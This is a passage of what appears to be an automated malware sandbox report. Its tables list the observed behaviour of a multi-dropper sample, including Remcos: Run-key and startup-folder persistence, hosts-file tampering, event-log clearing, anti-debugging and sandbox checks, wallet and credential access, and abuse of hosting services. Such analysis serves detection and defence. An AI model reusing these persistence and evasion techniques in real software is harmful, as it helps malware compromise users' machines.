| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\qwex.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx | C:\Windows\System32\svchost.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" | C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\ruts\11.reg | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\rutssvc64 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rfusclient.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\boleto | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\MicrosoftProfile | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\ruts\rutserv.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\wod2 | C:\Windows\system32\svchost.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\888.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe | N/A |
